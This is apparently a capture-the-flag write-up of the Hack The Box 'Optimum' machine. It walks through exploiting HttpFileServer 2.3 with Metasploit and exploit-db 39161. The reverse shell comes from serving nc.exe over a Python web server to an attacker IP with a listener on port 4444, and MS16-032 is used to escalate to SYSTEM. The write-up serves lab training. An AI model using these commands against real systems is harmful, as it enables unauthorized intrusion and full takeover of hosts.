1. Executive Summary
Optimum is windows machine which only ran port 80 for HTTPFileServer. According to scanning result the HFS version in used is 2.3 which is already obsolete.
The vulnerability found in this machine beside the outdated version of HTTPFileServer is MS16–032 : Secondary Logon Handle Privilege Escalation.
2. Description
2.1 Enumeration
First thing to do in footprinting or enumeration process is to know who is your target. In this case our target is 10.10.10.8.
By using nmap, I scan the host and found only one IP is open and its 80. Port 80 is used for HTTP services and based on my finding it used HTTPFileServer version 2.3.
2.2 Exploitation
Now that we know the version of HFS, next step is looking for way to exploit of the services.
Google is always the answer especially for me, a noob.
From google I found out that there is metasploit module for the vulnerability which is rejetto_hfs_exec.
While using the module, I have to set the target into the host’s IP which is 10.10.10.8.
msf > use exploit/windows/http/rejetto_hfs_exec
msf exploit(rejetto_hfs_exec) > show options //to see what requirement the modul had
msf exploit(rejetto_hfs_exec)> set RHOSTS 10.10.10.8
msf exploit(rejetto_hfs_exec) > run
After running the exploit, I discovered user flag inside C:\Users\kostas\Desktop\user.txt.txt.
Since I’m learning to take OSCP, I decided to find other ways to exploit. Especially it is known that the use of metasploit is limited. So I have to prepare from now to not so ‘needy’ to metasploit. Sorry metasploit but i still love you tho…
By going back to google to find original exploit script, I discovered a script in exploitdb. (https://www.exploit-db.com/exploits/39161).
Based on my understanding of the script, the script will upload nc.exe from the attacking machine and get the shell back.
Thus I tried to copy my nc.exe in my machine to my current folder so it will be easier to upload it on target machine with command in below.
cp /usr/share/windows-binaries/nc.exe /opt/HTB/optimum
Next I upload nc.exe via python HTTPServer. But before that I have to turn on the HTTPServer first with command in below.
python -m SimpleHTTPServer 80
in different windows, don’t forget to run a listener, I used port 4444.
nc -lnvp 4444
Now that it was set let’s get back to our exploit script. In the script there is two things to be modified.
ip_addr = "10.10.14.5" #local IP address
local_port = "4444" #listener's port
Now run the script until shell is showing up.
And there you are you got user flag. Congratulations!
2.3 Privilege Escalation
Usually root flag is saved in C:\Users\Administration\Desktop but when I tried to access Administration directory, I got access denied. Thus I have to look for another way.
Checking systeminfo or sysinfo is a must if our target is windows. If we gained systeminfo about our target, we can use a magic tool called Windows Exploit Suggester.
This tool is comparing what patch already used in target’s and the correct path that should be installed. https://github.com/AonCyberLabs/Windows-Exploit-Suggester.
I have tried to install the tools in my machine but unfortunately I had a problem with python module name xldr (even though I already installed and upgraded it).
So I used metasploit to install the tools. First I download their git repisitory using command in screenshot below.
And since I used metasploit, I don’t have pip installed inside there. Pip will be used installed another module.
After installed pip and xldr, I tried to run the script and it showed that it need to update, so I re-run the script and adding “ — update” behind it.
Now back to our tools or script. In the same terminal, I used this command in below to run the tools.
python windows-exploit-suggester.py –systeminfo systeminfo.txt –database 2018–11–25-mssb.xls
And in a second, list of patch is shown up in terminal. There are so many patch detected by the tools. In between them there is one patch that is good to try on which is MS16–032.
Now…………… after knowing the patch we have to look for the exploit. I googled “MS16–032” which refer me to a git respisitory.
I download the script “41020.exe” and now I’m back to meterpreter and upload the script into the machine.
According to screenshot, we are still kostas. It’s because the 41020.exe script has not yet running in the machine.
Note : The account NT AUTHORITY\System which is a Local System account.. It is a powerful account that has unrestricted access to all local system resources.
Now try to access C:\Users\Administration\Desktop back.
Finally got a root!
